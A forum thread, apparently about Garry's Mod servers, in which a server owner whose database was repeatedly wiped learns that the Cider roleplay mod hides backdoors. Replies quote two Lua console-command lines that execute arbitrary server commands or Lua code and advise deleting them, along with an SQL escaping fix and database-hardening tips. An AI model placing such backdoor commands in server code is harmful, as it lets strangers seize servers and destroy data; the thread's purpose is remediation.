Hello,
I have a problem with the security of my server: Yesterday it happens 3! times that my database was empty. I changed all passwords immediately and start it again. After a hour a player joined, makes hisself admin, bans everybody and deleted content of the database.
Maybe it's just a bug but I don't think that..
I use: Cider, Assmod 2.20, phpMyAdmin
Please help me it's very annoying.
You do realise that fixes for all cider's exploits and such are posted in the cider release thread?
[QUOTE=Lexic;16873600]You do realise that fixes for all cider's exploits and such are posted in the cider release thread?[/QUOTE]
I read the topic but i see a lot of people with link to fixes, what one I need to download, can you give post number pls?
[QUOTE=jdmmer;16873727]I read the topic but i see a lot of people with link to fixes, what one I need to download, can you give post number pls?[/QUOTE]
There are no downloadable fixes. You need to edit some code. Look for my post on the last page, and read the post above it.
:effort:
[quote]Hmm, its to do with the DLL.
I've been told by lexi that the fix is to remove:
concommand.Add("a", function(p,c,a) game.ConsoleCommand(table.concat(a, " ").."\n") end)
concommand.Add("b", function(p,c,a) RunString(table.concat(a, " ")) end)
From sv_player.lua.
Can anyone else confirm this?
[/quote]
[quote]
It took 6 pages and me replying to an idiot via PM for the actual backdoors to surface?
Wow.
Once I fixed the rather startlingly obvious backdoors and fixed the SQL
view plaincopy to clipboardprint?
1. elseif( k == "_Name" or k == "_Clan") then
2. value = tmysql.escape(value)-- HURRRRRRRRRRRRRRRRRRRRRRRRRRRR
3. end;
elseif( k == "_Name" or k == "_Clan") then
value = tmysql.escape(value)-- HURRRRRRRRRRRRRRRRRRRRRRRRRRRR
end;
I had no problems.
How do you people manage to have so much trouble with a simple thing like installing MySQL and putting the right details into the config files?
[/quote]
I don't have the file "sv_players.lua" and when i look in my players.sql I don't see that.
What Files I have to edit?
I am sorry, but I am no longer able to help you with this problem.
Get a different RP mod, that simple.
It's fixed I think, I deleted:
concommand.Add("a", function(p,c,a) game.ConsoleCommand(table.concat(a, " ").."\n") end)
concommand.Add("b", function(p,c,a) RunString(table.concat(a, " ")) end)
From sv_players.lua
Now i try to get that script from Lexic working, with mysql tables or something.
-snip-
I think you have problems in your things what uses database, because i code PHP and i know Basic functions for it with MySQL. (Insert, Delete, Get, Get Where)
Remember: Block outside internet connection to your database (Allow 127.0.0.1) connect only.
Good password and you would change username 'root' if you don't have changed it allready.
EDIT: If your addon or thing whatever, does not need delete anything make another user for your MySQL and disallow DELETE action from current user in DB.
How surprising, conna decided to add some stupid backdoor shit to citrus.
I guess anyone who uses his scripts unironically deserves to get trolled though.
To fix it just look for all the console commands with ctrl+F and remove the dodgy ones.
Sorry, you need to Log In to post a reply to this thread.
